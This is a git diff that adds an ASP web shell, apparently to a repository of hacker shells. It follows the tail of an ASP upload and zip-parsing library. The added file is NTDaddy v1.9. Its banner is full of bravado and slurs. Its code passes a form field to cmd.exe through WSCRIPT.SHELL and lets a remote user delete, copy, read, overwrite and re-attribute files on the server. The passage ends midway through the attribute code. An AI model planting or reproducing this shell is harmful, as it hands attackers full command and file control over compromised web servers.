+Class clsField
+Public Name
+Private mstrPath
+Public FileDir
+Public FileExt
+Public FileName
+Public ContentType
+Public Value
+Public BinaryData
+Public Length
+Private mstrText
+
+Public Property Get BLOB()
+BLOB = BinaryData
+End Property
+
+Public Function BinaryAsText()
+Dim lbinBytes
+Dim lobjRs
+If Length = 0 Then Exit Function
+If LenB(BinaryData) = 0 Then Exit Function
+
+If Not Len(mstrText) = 0 Then
+BinaryAsText = mstrText
+Exit Function
+End If
+lbinBytes = ASCII2Bytes(BinaryData)
+mstrText = Bytes2Unicode(lbinBytes)
+BinaryAsText = mstrText
+End Function
+
+Public Sub SaveAs(ByRef pstrFileName)
+Const adTypeBinary=1
+Const adSaveCreateOverWrite=2
+Dim lobjStream
+Dim lobjRs
+Dim lbinBytes
+If Length = 0 Then Exit Sub
+If LenB(BinaryData) = 0 Then Exit Sub
+Set lobjStream = Server.CreateObject("ADODB.Stream")
+lobjStream.Type = adTypeBinary
+Call lobjStream.Open()
+lbinBytes = ASCII2Bytes(BinaryData)
+Call lobjStream.Write(lbinBytes)
+On Error Resume Next
+Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)
+Call lobjStream.Close()
+Set lobjStream = Nothing
+End Sub
+
+Public Property Let FilePath(ByRef pstrPath)
+mstrPath = pstrPath
+If Not InStrRev(pstrPath, ".") = 0 Then
+FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1)
+FileExt = UCase(FileExt)
+End If
+If Not InStrRev(pstrPath, "\") = 0 Then
+FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1)
+End If
+If Not InStrRev(pstrPath, "\") = 0 Then
+FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1)
+End If
+End Property
+
+Public Property Get FilePath()
+FilePath = mstrPath
+End Property
+
+Private Function ASCII2Bytes(ByRef pbinBinaryData)
+Const adLongVarBinary=205
+Dim lobjRs
+Dim llngLength
+Dim lbinBuffer
+llngLength = LenB(pbinBinaryData)
+Set lobjRs = Server.CreateObject("ADODB.Recordset")
+Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength)
+Call lobjRs.Open()
+Call lobjRs.AddNew()
+Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))
+Call lobjRs.Update()
+lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)
+Call lobjRs.Close()
+Set lobjRs = Nothing
+ASCII2Bytes = lbinBuffer
+End Function
+
+Private Function Bytes2Unicode(ByRef pbinBytes)
+Dim lobjRs
+Dim llngLength
+Dim lstrBuffer
+llngLength = LenB(pbinBytes)
+Set lobjRs = Server.CreateObject("ADODB.Recordset")
+Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)
+Call lobjRs.Open()
+Call lobjRs.AddNew()
+Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
+Call lobjRs.Update()
+lstrBuffer = lobjRs.Fields("BinaryData").Value
+Call lobjRs.Close()
+Set lobjRs = Nothing
+Bytes2Unicode = lstrBuffer
+End Function
+End Class
+
+'###########################################################################################
+
+Class clsUpload
+Private mbinData
+Private mlngChunkIndex
+Private mlngBytesReceived
+Private mstrDelimiter
+Private CR
+Private LF
+Private CRLF
+Private mobjFieldAry()
+Private mlngCount
+
+Private Sub RequestData
+Dim llngLength
+mlngBytesReceived = Request.TotalBytes
+mbinData = Request.BinaryRead(mlngBytesReceived)
+End Sub
+
+Private Sub ParseDelimiter()
+mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)
+End Sub
+
+Private Sub ParseData()
+Dim llngStart
+Dim llngLength
+Dim llngEnd
+Dim lbinChunk
+llngStart = 1
+llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF)
+While Not llngStart = 0
+llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2
+llngLength = llngEnd - llngStart
+lbinChunk = MidB(mbinData, llngStart, llngLength)
+Call ParseChunk(lbinChunk)
+llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)
+Wend
+End Sub
+
+Private Sub ParseChunk(ByRef pbinChunk)
+Dim lstrName
+Dim lstrFileName
+Dim lstrContentType
+Dim lbinData
+Dim lstrDisposition
+Dim lstrValue
+lstrDisposition = ParseDisposition(pbinChunk)
+lstrName = ParseName(lstrDisposition)
+lstrFileName = ParseFileName(lstrDisposition)
+lstrContentType = ParseContentType(pbinChunk)
+If lstrContentType = "" Then
+lstrValue = CStrU(ParseBinaryData(pbinChunk))
+Else
+lbinData = ParseBinaryData(pbinChunk)
+End If
+Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData)
+End Sub
+
+Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)
+Dim lobjField
+ReDim Preserve mobjFieldAry(mlngCount)
+Set lobjField = New clsField
+lobjField.Name = pstrName
+lobjField.FilePath = pstrFileName 
+lobjField.ContentType = pstrContentType
+If LenB(pbinData) = 0 Then
+lobjField.BinaryData = ChrB(0)
+lobjField.Value = pstrValue
+lobjField.Length = Len(pstrValue)
+Else
+lobjField.BinaryData = pbinData
+lobjField.Length = LenB(pbinData)
+lobjField.Value = ""
+End If
+Set mobjFieldAry(mlngCount) = lobjField
+mlngCount = mlngCount + 1
+End Sub
+
+Private Function ParseBinaryData(ByRef pbinChunk)
+Dim llngStart
+llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
+If llngStart = 0 Then Exit Function
+llngStart = llngStart + 4
+ParseBinaryData = MidB(pbinChunk, llngStart)
+End Function
+
+Private Function ParseContentType(ByRef pbinChunk)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStrB(llngStart + 15, pbinChunk, CR)
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 15
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))
+End Function
+
+Private Function ParseDisposition(ByRef pbinChunk)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF)
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 22
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))
+End Function
+
+Private Function ParseName(ByRef pstrDisposition)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStr(llngStart + 6, pstrDisposition, """")
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 6
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseName = Mid(pstrDisposition, llngStart, llngLength)
+End Function
+' ------------------------------------------------------------------------------
+Private Function ParseFileName(ByRef pstrDisposition)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStr(llngStart + 10, pstrDisposition, """")
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 10
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseFileName = Mid(pstrDisposition, llngStart, llngLength)
+End Function
+
+Public Property Get Count()
+Count = mlngCount
+End Property
+
+Public Default Property Get Fields(ByVal pstrName)
+Dim llngIndex
+If IsNumeric(pstrName) Then
+llngIndex = CLng(pstrName)
+If llngIndex > mlngCount - 1 Or llngIndex < 0 Then
+Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.")
+Exit Property
+End If
+Set Fields = mobjFieldAry(pstrName)
+Else
+pstrName = LCase(pstrname)
+For llngIndex = 0 To mlngCount - 1
+If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then
+Set Fields = mobjFieldAry(llngIndex)
+Exit Property
+End If
+Next
+End If
+Set Fields = New clsField
+End Property
+
+Private Sub Class_Terminate()
+Dim llngIndex
+For llngIndex = 0 To mlngCount - 1
+Set mobjFieldAry(llngIndex) = Nothing
+
+Next
+ReDim mobjFieldAry(-1)
+End Sub
+
+Private Sub Class_Initialize()
+ReDim mobjFieldAry(-1)
+CR = ChrB(Asc(vbCr))
+LF = ChrB(Asc(vbLf))
+CRLF = CR & LF
+mlngCount = 0
+Call RequestData
+Call ParseDelimiter()
+Call ParseData
+End Sub
+
+Private Function CStrU(ByRef pstrANSI)
+Dim llngLength
+Dim llngIndex
+llngLength = LenB(pstrANSI)
+For llngIndex = 1 To llngLength
+CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))
+Next
+End Function
+
+Private Function CStrB(ByRef pstrUnicode)
+Dim llngLength
+Dim llngIndex
+llngLength = Len(pstrUnicode)
+For llngIndex = 1 To llngLength
+CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))
+Next
+End Function
+End Class
+
+'###########################################################################################
+
+Class clsZip
+Private mbin_Zip
+Private mobj_Files()
+Private mlng_Files
+
+Sub ZipLoad(pstrFileName)
+Dim lobjFSO
+Dim llngTristateFalse
+Dim llngForReading
+dim objStream
+
+mbin_Zip = ""
+
+If pstrFileName = "" Then Exit Sub
+
+If InStr(1, pstrFileName, ":\") = 0 Then
+pstrFileName = Server.MapPath(pstrFileName)
+End If
+
+Set lobjFSO = Server.CreateObject("Scripting.FileSystemObject")
+
+If lobjFSO.FileExists(pstrFileName) Then
+set objStream=Server.CreateObject("ADODB.Stream")
+objStream.Type=1
+objStream.Open
+on error resume next
+objStream.LoadFromFile(pstrFileName)
+mbin_Zip = objStream.Read
+set objStream=nothing
+End If
+
+Set lobjFSO = Nothing
+
+Call ParseZips()
+
+End Sub
+
+Public Property Let ZipData(ByRef pbinBinaryData)
+mbin_Zip = pbinBinaryData
+Call ParseZips()
+End Property
+Public Property Get FileCount()
+FileCount = mlng_Files
+End Property
+Public Property Get GetFile(ByRef plngIndex)
+Set GetFile = mobj_Files(plngIndex-1)
+End Property
+
+Private Sub ParseZips()
+Dim llngOffSet
+mlng_Files = 0
+llngOffSet = 0
+If LenB(mbin_Zip) = 0 Then Exit Sub
+Do
+' Find next PK 3.04 record
+llngOffset = InStrB(llngOffset + 1, mbin_zip, ChrB(&h50) & ChrB(&h4B) & ChrB(&h03) & ChrB(&h04))
+If llngOffset = 0 Then Exit Do
+llngOffset = llngOffset - 1
+ReDim Preserve mobj_Files(mlng_Files)
+Set mobj_Files(mlng_Files) = New clsZipFile
+With mobj_Files(mlng_Files)
+.Signature = GetString(llngOffset + 1, 2) & " " & CInt(GetHex(llngOffset + 3, 1)) & "." & GetHex(llngOffset + 4, 1)
+.ExtractVersion = FormatNumber(GetNumber(llngOffset + 5, 2) * .1, 1, True)
+.GeneralPurposeFlags = GetNumber(llngOffset + 7, 2)
+.CompressionMethod = GetNumber(llngOffset + 9, 2)
+.LastModifiedTime = GetNumber(llngOffset + 11, 2)
+.LastModifiedDate = GetNumber(llngOffset + 13, 2)
+.CRC32 = GetNumber(llngOffset + 15, 4)
+.CompressedSize = GetNumber(llngOffset + 19, 4)
+.UncompressedSize = GetNumber(llngOffset + 23, 4)
+.FileNameLength = GetNumber(llngOffset + 27, 2)
+.ExtraFieldLength = GetNumber(llngOffset + 29, 2)
+.FileName = GetString(llngOffset + 31, .FileNameLength)
+.ExtraField = GetString(llngOffset + 31 + .FileNameLength, .ExtraFieldLength)
+.StartByte = llngOffSet + 1
+.EndByte = llngOffSET + .FileNameLength + .ExtraFieldLength + .CompressedSize + 30
+' .BinaryData = MidB(pbin_Zip, llngOffSET + .FileNameLength + .ExtraFieldLength + 30, .CompressedSize)
+' .LocalFileHeader = GetString(llngOffset + 1, .FileNameLength + .ExtraFieldLength + 30)
+llngOffSet = .EndByte
+.IsOverall = (.Name = "" And .Path = "")
+.IsFolder = (.Name = "" And Not .Path = "")
+End With
+mlng_Files = mlng_Files + 1
+Loop While mobj_Files(mlng_Files - 1).EndByte < LenB(mbin_zip)
+End Sub
+
+Private Function GetHex(plngStart, plngLength)
+Dim llngIndex
+Dim lstrHex
+For llngIndex = 0 To plngLength - 1
+lstrHex = lstrHex & Right("0" & Hex(AscB(MidB(mbin_zip, plngStart + llngIndex, 1))), 2)
+Next
+GetHex = lstrHex
+End Function
+
+Private Function GetString(plngStart, plngLength)
+Dim llngIndex
+Dim lstrString
+If LenB(mbin_zip) < (plngStart + (plngLength - 1)) Then Exit Function
+For llngIndex = 0 To plngLength - 1
+If AscB(MidB(mbin_zip, plngStart + llngIndex, 1)) = 0 Then
+lstrString = lstrString & " "
+Else
+lstrString = lstrString & Chr(AscB(MidB(mbin_zip, plngStart + llngIndex, 1)))
+End If
+Next
+GetString = lstrString
+End Function
+
+Private Function GetNumber(plngStart, plngLength)
+If plngStart < 0 Then Exit Function
+Dim llngIndex
+Dim lstrHex
+For llngIndex = 0 To plngLength - 1
+lstrHex = Right("0" & Hex(AscB(MidB(mbin_zip, plngStart + llngIndex, 1))), 2) & lstrHex
+Next
+GetNumber = CDbl("&h" & lstrHex)
+End Function
+
+Function GetDate(plngStart)
+Dim llngDate
+llngDate = GetNumber(plngStart, 2)
+GetDate = DateSerial(1980 + (llngDate And &HFE00) \ &H200, (llngDate And &H1E0) \ &H20, llngDate And &H1F)
+End Function
+
+Function GetTime(plngStart)
+Dim llngDate
+llngDate = GetNumber(plngStart, 2)
+GetTime = TimeSerial((llngDate And &HF800) \ &H800, (llngDate And &H7E0) \ &H20, (llngDate And &H1F) * 2)
+End Function
+End Class
+
+Class clsZipFile
+Public Signature
+Public ExtractVersion
+Public GeneralPurposeFlags
+Public CompressionMethod
+Public LastModifiedTime
+Public LastModifiedDate
+Public CRC32
+Public CompressedSize
+Public UncompressedSize
+Public FileNameLength
+Public ExtraFieldLength
+Public FileName
+Public ExtraField
+Public StartByte
+Public EndByte
+Public BinaryData
+Public LocalFileHeader
+
+Public IsFolder
+Public IsOverall
+
+Public Property Get Name
+Dim lstrPath
+lstrPath = Replace(FileName, "/", "\")
+If InStr(1, lstrPath, "\") = "0" Then
+Name = lstrPath
+Exit Property
+End If
+Name = Mid(lstrPath, InStrRev(lstrPath, "\") + 1)
+End Property
+
+Public Property Get Path
+Dim lstrPath
+lstrPath = Replace(FileName, "/", "\")
+If InStr(1, lstrPath, "\") = "0" Then
+Path = ""
+Exit Property
+End If
+Path = Mid(lstrPath, 1, InStrRev(lstrPath, "\"))
+End Property
+
+Public Property Get Packed
+Packed = CompressedSize
+End Property
+
+Public Property Get Ratio
+If UncompressedSize = 0 Then Exit Property
+If CompressedSize >= UncompressedSize Then
+Ratio = "0%"
+Else
+Ratio = FormatNumber(((1 - (CompressedSize / UncompressedSize)) * 100), 0, True, False, True) & "%"
+End If
+End Property
+
+Public Property Get Modified()
+Modified = CDate(GetDate(LastModifiedDate) & " " & GetTime(LastModifiedTime))
+End Property
+
+Private Function GetDate(plngDate)
+GetDate = DateSerial(1980 + (plngDate And &HFE00) \ &H200, _
+(plngDate And &H1E0) \ &H20, plngDate And &H1F)
+End Function
+
+Private Function GetTime(plngDate)
+GetTime = TimeSerial((plngDate And &HF800) \ &H800, _
+(plngDate And &H7E0) \ &H20, _
+(plngDate And &H1F) * 2)
+End Function
+
+Public Property Get Size()
+Size = UncompressedSize
+End Property
+
+Public Property Get BitMask()
+Dim llngNumber
+Dim lstrBits
+llngNumber = GeneralPurposeFlags
+Do
+If llngNumber Mod 2 = 1 Then lstrBits = "1" & lstrBits Else lstrBits = "0" & lstrBits
+llngNumber = llngNumber \ 2
+Loop Until llngNumber = 0
+lstrBits = Right("0000000000000000" & lstrBits, 16)
+For llngNumber = 0 To 3
+lstrReturn = lstrReturn & Mid(lstrBits, (llngNumber * 4) + 1, 4) & "."
+Next
+BitMask = Left(lstrReturn, 19)
+End Property
+
+Property Get CompressionMethodString()
+Select Case CompressionMethod
+Case 0 CompressionMethodString = "The file is stored (no compression)"
+Case 1 CompressionMethodString = "The file is Shrunk"
+Case 2 CompressionMethodString = "The file is Reduced with compression factor 1"
+Case 3 CompressionMethodString = "The file is Reduced with compression factor 2"
+Case 4 CompressionMethodString = "The file is Reduced with compression factor 3"
+Case 5 CompressionMethodString = "The file is Reduced with compression factor 4"
+Case 6 CompressionMethodString = "The file is Imploded"
+Case 7 CompressionMethodString = "Reserved for Tokenizing compression algorithm"
+Case 8 CompressionMethodString = "The file is Deflated"
+Case 9 CompressionMethodString = "Reserved for enhanced Deflating"
+Case 10 CompressionMethodString = "PKWARE Date Compression Library Imploding"
+Case Else CompressionMethodString = "Unhandled Copression type: " & CompressionMethod
+End Select
+End Property
+End Class
+%>
\ No newline at end of file
diff --git a/xakep-shells/ASP/NT Addy.asp.txt b/xakep-shells/ASP/NT Addy.asp.txt
new file mode 100644
index 0000000..bbcba0a
--- /dev/null
+++ b/xakep-shells/ASP/NT Addy.asp.txt	
@@ -0,0 +1,1012 @@
+<!--
+_______________________________________
+|NTDaddy v1.9 by obzerve of fux0r inc.|
+|=====================================|
+|Vol.1:_Art.19:_Silent_Tactics_Archive|
+|******! PUBLIC ! DISTRIBUTION !******|
+|-------------------------------------|
+|    Welcome to the world of ez remote|
+|administration made possible by your |
+|friends at fux0r inc. NTDaddy is the |
+|most kickass WinNT CGI ninja commando|
+|tool you've seen yet. Refer to the   |
+|included read me of the original pub |
+|distribution for details. Don't just |
+|give it out, make people look for it.|
+|And dont be a fuckin cock choking    |
+|gutter slut and try to pass it off as|
+|your own. Because if you do, you suck|
+|ass. Also to avoid hipocrisy, yes a  |
+|small snippet was borrowed for a few |
+|parts here and there but for the     |
+|majority is original code by me,     |
+|obzerve of fux0r inc. Anyway if you  |
+|find something that looks 'built-on',|
+|i just made it better, you know how  |
+|it is...              oh well, enjoy!|
+|-------------------------------------|
+|     -obzerve : mr_o@ihateclowns.com |
+=======================================
+-->
+<%@ Language=VBScript %>
+<%Dim oScript
+Dim oScriptNet
+Dim oFileSys, oFile
+Dim szCMD, szTempFile
+On Error Resume Next
+Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+szCMD = Request.Form(".CMD")
+If (szCMD <> "") Then
+szTempFile = "C:\" & oFileSys.GetTempName( )
+Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
+Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
+End If%>
+<% if request.form("flag")=""then %>
+<html>
+<head>
+<title>|[NTDaddy v1.9 - obzerve | fux0r inc.]</title>
+<%
+'Commands
+dim fs,f
+dim FilePath,FolderPath,FileTo,Cmd
+dim selFolder,FolderTo
+dim Tempmsg
+dim TempAtt
+dim TextOutput,TextWrite,TextFile,lblioMode,lblFormat,TextCreateFormat
+Const ForReading = 1, ForWriting = 2, ForAppending = 3
+Set fs = CreateObject("Scripting.FileSystemObject")
+FilePath=Request.Form("FileName")
+FolderPath=Request.Form("FolderPath")
+selFolder=Request.Form("FolderName")
+FolderTo=Request.form("CopyFolderTo")
+FileTo=Request.Form("CopyFileTo")
+Cmd=Request.Form("cmdOption")
+TextCmd=Request.form("cmdtxtFileOption")
+Select case Cmd
+case "DeleteFile"       
+fs.deletefile FilePath,TRUE
+response.write("File: " & FilePath & " has been deleted.")
+case "DeleteFolder"     
+fs.deletefolder selFolder,TRUE
+response.write("Folder: " & selFolder & " has been deleted.")
+FolderPath=Request.form("RefreshFolderPath")
+case "CopyFile"
+fs.CopyFile FilePath,FileTo, TRUE
+response.write("File: " & FilePath & " has been copied to " & FileTo & ".")
+case "CopyFolder"
+fs.CopyFolder selFolder,FolderTo, TRUE
+response.write("Folder: " & selFolder & " has been copied to " & FolderTo & ".")
+case "SetFileAttributes"
+on error resume next
+if FilePath <> "" then
+Set f = fs.GetFile(FilePath)
+select case f.attributes
+case 0
+FileAttributes = "Normal"
+case 1
+FileAttributes = "Read Only"
+case 2
+FileAttributes = "Hidden"
+case 3  'Extra
+FileAttributes = "Read Only, Hidden"
+case 4
+FileAttributes = "System"
+case 7  'Extra
+FileAttributes = "Read Only, Hidden, System"
+case 8
+FileAttributes = "Volume"
+case 16
+FileAttributes = "Directory"
+case 19
+FileAttributes = "Read Only, Hidden, Directoy"
+case 23
+FileAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FileAttributes = "Archive"
+case 33 'Extra
+FileAttributes = "Read Only, Archive"
+case 34 'Extra
+FileAttributes = "Hidden, Archive"
+case 38 'Extra
+FileAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FileAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FileAttributes = "Directory, Archive"
+case 64
+FileAttributes = "Alias"
+case 128
+FileAttributes = "Compressed"
+case else
+FileAttributes = f.attributes
+end select
+end if  
+response.write("<form name=frmFileAttributes action=ntdaddy.asp method=post>")
+response.write("<input type=hidden name=FileName Value=" & chr(34) & FilePath & chr(34) & ">")
+response.write("<input type=hidden name=FolderPath Value=" & chr(34) & FolderPath & chr(34) & ">")
+response.write("<center><Table border=5 cellpadding=3 bordercolor=#ffffff>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>File Name: " & f.name & "</td>")
+response.write("<td rowspan=5><center><u><b>Set New Attributes:</b></u></center>")
+response.write("<input type=checkbox name=FileAttribute1 value=0 checked>Normal")
+response.write("<br><input type=checkbox name=FileAttribute2 value=1>Read Only")
+response.write("<br><input type=checkbox name=FileAttribute3 value=2>Hidden")
+response.write("<br><input type=checkbox name=FileAttribute4 value=4>System")
+response.write("<br><input type=checkbox name=FileAttribute5 value=8>Volume")
+response.write("<br><input type=checkbox name=FileAttribute6 value=16>Directory")
+response.write("<br><input type=checkbox name=FileAttribute7 value=32>Archive")
+response.write("<br><input type=checkbox name=FileAttribute8 value=64>Alias")
+response.write("<br><input type=checkbox name=FileAttribute9 value=128>Compressed")
+response.write("<br><center><input type=submit name=cmdOption value=ApplyFileAttributes></center>")
+response.write("</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Type of File: " & f.type & "</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Location: " & f.path)
+response.write("<br>Size: " & FormatNumber(f.size/1024, 2)  & "KB  (" & f.size & " bytes)</td></tr>")
+if f.DateCreated = "" then
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: ----")
+else
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: " & f.DateCreated)
+end if
+if f.DateLastAccessed = "" then
+response.write("<br>Modified: ----")
+else
+response.write("<br>Modified: " & f.DateLastAccessed)
+end if
+if f.DateLastModified = "" then
+response.write("<br>Accessed: ----</td></tr>")
+else
+response.write("<br>Accessed: " & f.DateLastModified & "</td></tr>")
+end if
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Attributes: " & FileAttributes & "</td></tr>")
+response.write("</table></center></form>")
+case "SetFolderAttributes"
+on error resume next
+FolderPath=Request.form("RefreshFolderPath")
+if selFolder <> "" then
+Set f = fs.Getfolder(selFolder)
+select case f.attributes
+case 0
+FolderAttributes = "Normal"
+case 1
+FolderAttributes = "Read Only"
+case 2
+FolderAttributes = "Hidden"
+case 3  'Extra
+FolderAttributes = "Read Only, Hidden"
+case 4
+FolderAttributes = "System"
+case 7  'Extra
+FolderAttributes = "Read Only, Hidden, System"
+case 8
+FolderAttributes = "Volume"
+case 16
+FolderAttributes = "Directory"
+case 17 'Extra
+FolderAttributes = "Read Only, Directory"
+case 18 'Extra
+FolderAttributes = "Hidden, Directory"
+case 19
+FolderAttributes = "Read Only, Hidden, Directoy"
+case 20 'Extra
+FolderAttributes = "System, Directory"
+case 22 'Extra
+FolderAttributes = "Hidden, System. Directory"
+case 23
+FolderAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FolderAttributes = "Archive"
+case 33 'Extra
+FolderAttributes = "Read Only, Archive"
+case 34 'Extra
+FolderAttributes = "Hidden, Archive"
+case 38 'Extra
+FolderAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FolderAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FolderAttributes = "Directory, Archive"
+case 64
+FolderAttributes = "Alias"
+case 128
+FolderAttributes = "Compressed"
+case else
+FolderAttributes = f1.attributes
+end select
+end if  
+response.write("<form name=frmFolderAttributes action=ntdaddy.asp method=post>")
+response.write("<input type=hidden name=FolderName Value=" & chr(34) & selFolder & chr(34) & ">")
+response.write("<input type=hidden name=FolderPath Value=" & chr(34) & FolderPath & chr(34) & ">")
+response.write("<center><Table border=5 cellpadding=3 cellspacing=1 bordercolor=#ffffff>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Folder Name: " & f.name & "</td>")
+response.write("<td rowspan=5><center><u><b>Set New Attributes:</b></u></center>")
+response.write("<input type=checkbox name=FolderAttribute1 value=0 checked>Normal")
+response.write("<br><input type=checkbox name=FolderAttribute2 value=1>Read Only")
+response.write("<br><input type=checkbox name=FolderAttribute3 value=2>Hidden")
+response.write("<br><input type=checkbox name=FolderAttribute4 value=4>System")
+response.write("<br><input type=checkbox name=FolderAttribute5 value=8>Volume")
+response.write("<br><input type=checkbox name=FolderAttribute6 value=16>Directory")
+response.write("<br><input type=checkbox name=FolderAttribute7 value=32>Archive")
+response.write("<br><input type=checkbox name=FolderAttribute8 value=64>Alias")
+response.write("<br><input type=checkbox name=FolderAttribute9 value=128>Compressed")
+response.write("<br><center><input type=submit name=cmdOption value=ApplyFolderAttributes></center>")
+response.write("</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Type of Folder: " & f.type & "</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Location: " & f.path)
+response.write("<br>Size: " & FormatNumber(f.size/1024, 2)  & "KB  (" & f.size & " bytes)</td></tr>")
+if f.DateCreated = "" then
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: ----")
+else
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: " & f.DateCreated)
+end if
+if f.DateLastAccessed = "" then
+response.write("<br>Modified: ----")
+else
+response.write("<br>Modified: " & f.DateLastAccessed)
+end if
+if f.DateLastModified = "" then
+response.write("<br>Accessed: ----</td></tr>")
+else
+response.write("<br>Accessed: " & f.DateLastModified & "</td></tr>")
+end if
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Attributes: " & FolderAttributes & "</td></tr>")
+response.write("</table></center></form>")
+case "OpenTextFile"
+If FilePath <> "" then
+lblioMode=Request.form("optiomode")
+lblFormat=request.form("optformat")
+set TextFile = fs.OpenTextFile (FilePath, lblioMode, lblFormat)
+TextOutput = TextFile.ReadAll   
+'TextOutput=""
+'Do While TextFile.AtEndOfStream <> True
+'       TextOutput = TextOutput & TextFile.ReadLine
+'Loop
+TextFile.close
+else
+FilePath = FolderPath
+end if
+response.write("<form name=frmTextFile action=ntdaddy.asp method=post>")
+response.write("<center><table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff width=100% height=100% >")
+response.write("<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOption value=SaveAs><input type=text size=77 name=FileName value=" & chr(34) & FilePath & chr(34) & "><select name=optUnicode><option value=FALSE>ASCII <option value=TRUE>Unicode</select></td></tr>")
+response.write("<tr><td bgcolor=#ffffff><center><textarea name=txtFile rows=20 cols=85>" & TextOutput & "</textarea></center></td></tr>")
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write("<ERROR: THIS IS NOT A TEXT FILE>")
+response.write(chr(13))
+response.write("<FilePath: " & FilePath & ">")
+response.write(chr(13))
+response.write("<ioMode: " & lblioMode & ">")
+response.write(chr(13))
+response.write("<Format: " & lblFormat & ">")
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write("<tr><td><input type=hidden name=FolderPath Value=" & chr(34) & FolderPath & chr(34) & "></td></tr>")
+response.write("</table></center><p>") 
+case "ApplyFileAttributes"
+TempAtt=int(Request.form("FileAttribute1"))
+TempAtt=TempAtt + int(Request.form("FileAttribute2"))
+TempAtt=TempAtt + int(Request.form("FileAttribute3"))
+TempAtt=TempAtt + int(Request.form("FileAttribute4"))
+TempAtt=TempAtt + int(Request.form("FileAttribute5"))
+TempAtt=TempAtt + int(Request.form("FileAttribute6"))
+TempAtt=TempAtt + int(Request.form("FileAttribute7"))
+TempAtt=TempAtt + int(Request.form("FileAttribute8"))
+TempAtt=TempAtt + int(Request.form("FileAttribute9"))
+Set f = fs.GetFile(FilePath)
+f.attributes=int(TempAtt)
+response.write("File: " & FilePath & " attributes have been changed.")
+case "ApplyFolderAttributes"
+FolderPath=Request.form("RefreshFolderPath")
+TempAtt=int(Request.form("FolderAttribute1"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute2"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute3"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute4"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute5"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute6"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute7"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute8"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute9"))
